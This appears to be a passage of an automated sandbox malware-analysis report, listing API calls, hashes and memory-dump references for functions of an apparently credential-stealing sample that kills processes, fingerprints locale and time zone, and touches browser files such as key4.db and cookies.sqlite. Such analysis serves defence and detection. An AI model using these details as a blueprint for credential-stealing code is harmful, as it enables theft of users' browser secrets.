                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Filelstrcpy$Locallstrcatlstrlen$AllocCloseCopyCreateFindFirstFreeHandleReadSizeSystemTimestrlen
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$\key4.db$cookies.sqlite
                                                                                                                                                                                                                                                                                                  • API String ID: 621517324-1530792146
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0094addd846d71e39c1ca082329bb6913a67108e446e9512760ecdb6ec231e4e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 855358d25c22b69566fbc42c17e74533ab55524d0b71b666bfbe4b79f85c7bd2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0094addd846d71e39c1ca082329bb6913a67108e446e9512760ecdb6ec231e4e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CC1B631A102189BCF14EBB1CC95AEE7779AF44304F44005EF80667292DB7C6EC5CBA9
                                                                                                                                                                                                                                                                                                  Function 00411FA0 Relevance: 13.6, APIs: 9, Instructions: 59processCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411FB6
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 00411FC4
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00411FD0
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411FF1
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00411FFE
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 0041200A
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041201E
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041202D
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412036
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                                  • Instruction ID: 924cd2998aa8e6582c44da8d0305fac9719003efd41fa9ed3311d7015259d757
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B115231104305AFD3201F61BD0CFAFBAADEBC9785F04501DFA45D62A0DF79A851CAA9
                                                                                                                                                                                                                                                                                                  Function 004109F0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$InfoKeyboardLayoutListLocalLocale$AllocFreelstrcatlstrlenmemset
                                                                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                                                                  • API String ID: 2580590304-4001269591
                                                                                                                                                                                                                                                                                                  • Opcode ID: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                                  • Instruction ID: eea5c3a77f3b4bcccf0633d63ef4e7b0d3230a8af430361ee2a26d3609cb3d8b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5831A8313043186BD7106B919C89FAF779DEB85748F00051EF9469B291DABCAD8487A9
                                                                                                                                                                                                                                                                                                  Function 00412050 Relevance: 12.1, APIs: 8, Instructions: 54processCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412065
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00412071
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 0041207D
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412091
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00412099
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120B6
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120C5
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120CE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                                  • Instruction ID: 36dad1cb0fcbca0ffdfdd7c06b199559f2c5def7befbfc21f7e452e0f853ed5d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93017571201214AFE7205B20BD48FBFBEADEF85781F14151DF605D6190CBA99CA1C6BA
                                                                                                                                                                                                                                                                                                  Function 004116B0 Relevance: 10.6, APIs: 7, Instructions: 62memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$BinaryCryptProcessString$AllocateErrorFreeLast
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 798923657-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                                  • Instruction ID: b00e23e61dcd96af2d5a42df421a2e3100774d4436a7fe2bda2c6e10979a2865
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C114575204202AFE7208F25EC44F67BBA9EF88700F15081DF6A2973A0DB75EC41CBA5
                                                                                                                                                                                                                                                                                                  Function 00410990 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32memorytimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: wwww
                                                                                                                                                                                                                                                                                                  • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                                                                  • Opcode ID: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9378462ab9666fb6dba0cc2dba94d0b141e63b92265a990e46b9389926462d0e
